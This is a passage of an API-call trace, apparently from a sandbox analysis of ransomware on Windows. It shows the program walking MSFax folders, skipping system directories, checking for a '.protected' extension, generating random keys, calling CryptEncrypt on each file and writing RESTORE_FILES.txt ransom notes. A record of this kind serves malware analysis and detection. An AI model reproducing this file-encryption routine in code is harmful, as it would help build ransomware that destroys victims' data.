lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files") returned -1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="Program Files (x86)") returned -1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1="Common Coverpages", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 67 [0093.290] lstrcmpW (lpString1="Common Coverpages", lpString2=".") returned 1 [0093.290] lstrcmpW (lpString1="Common Coverpages", lpString2="..") returned 1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned 69 [0093.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.290] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.290] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.290] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.290] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.290] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\.") returned 69 [0093.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\..") returned 70 [0093.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="Program Files") 
returned -1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 73 [0093.291] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.291] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned 75 [0093.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.291] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.291] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\.") returned 75 [0093.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.291] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.291] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.291] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\..") returned 76 [0093.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.292] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.292] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="Windows") returned -1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files") returned -1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="Program Files (x86)") returned -1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="$Recycle.bin") returned 1 [0093.292] lstrcmpiW (lpString1="confident.cov", lpString2="System Volume Information") returned -1 [0093.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 87 [0093.292] StrStrIW (lpFirst="confident.cov", lpSrch=".protected") returned 0x0 [0093.292] lstrcmpW (lpString1="confident.cov", lpString2="RESTORE_FILES.txt") returned -1 [0093.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.292] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.292] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="Windows") returned -1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files") returned -1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="Program Files (x86)") returned -1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="$Recycle.bin") returned 1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="System Volume Information") returned -1 [0093.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 81 [0093.292] StrStrIW (lpFirst="fyi.cov", lpSrch=".protected") returned 0x0 [0093.292] lstrcmpW (lpString1="fyi.cov", lpString2="RESTORE_FILES.txt") returned -1 [0093.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.292] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.292] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="Windows") returned -1 [0093.292] lstrcmpiW 
(lpString1="generic.cov", lpString2="Program Files") returned -1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files (x86)") returned -1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="$Recycle.bin") returned 1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="System Volume Information") returned -1 [0093.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 85 [0093.292] StrStrIW (lpFirst="generic.cov", lpSrch=".protected") returned 0x0 [0093.292] lstrcmpW (lpString1="generic.cov", lpString2="RESTORE_FILES.txt") returned -1 [0093.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.293] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.293] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume 
Information") returned -1 [0093.293] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt") returned 91 [0093.293] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.293] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.293] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="Windows") returned -1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files") returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files (x86)") returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="$Recycle.bin") returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="System Volume Information") returned 1 [0093.293] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 84 [0093.293] StrStrIW (lpFirst="urgent.cov", lpSrch=".protected") returned 0x0 [0093.293] lstrcmpW (lpString1="urgent.cov", lpString2="RESTORE_FILES.txt") returned 1 [0093.293] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.293] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.293] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.293] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.293] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt") returned 91 [0093.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.293] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.294] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt") returned 85 [0093.294] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.294] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.294] 
FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt") returned 85 [0093.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.294] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="Windows") returned -1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="Program Files") returned -1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="Program Files (x86)") returned -1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 55 [0093.294] lstrcmpW (lpString1="Inbox", lpString2=".") returned 1 [0093.294] lstrcmpW (lpString1="Inbox", lpString2="..") returned 1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned 57 [0093.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.294] lstrcmpiW (lpString1=".", lpString2="Program 
Files") returned -1 [0093.294] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\.") returned 57 [0093.294] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.294] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.294] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.294] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.294] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\..") returned 58 [0093.294] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.294] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt") returned 73 [0093.295] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.295] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.295] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt") returned 73 [0093.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.295] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="Program Files") returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="Program Files (x86)") returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="$Recycle.bin") returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="System Volume Information") returned -1 [0093.295] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 55 [0093.295] lstrcmpW (lpString1="Queue", lpString2=".") returned 1 [0093.295] lstrcmpW (lpString1="Queue", lpString2="..") returned 1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned 57 [0093.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.295] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.295] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.295] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.295] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\.") returned 57 [0093.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.295] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.296] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.296] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.296] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\..") returned 58 [0093.296] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.296] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.296] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.296] 
lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.296] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt") returned 73 [0093.296] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.296] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.296] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.296] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.296] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt") returned 73 [0093.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.296] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") 
returned -1 [0093.296] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt") returned 67 [0093.296] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.296] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.296] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.296] lstrcmpiW (lpString1="SentItems", lpString2="Windows") returned -1 [0093.296] lstrcmpiW (lpString1="SentItems", lpString2="Program Files") returned 1 [0093.296] lstrcmpiW (lpString1="SentItems", lpString2="Program Files (x86)") returned 1 [0093.297] lstrcmpiW (lpString1="SentItems", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1="SentItems", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 59 [0093.297] lstrcmpW (lpString1="SentItems", lpString2=".") returned 1 [0093.297] lstrcmpW (lpString1="SentItems", lpString2="..") returned 1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned 61 [0093.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.297] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.297] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.297] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.297] 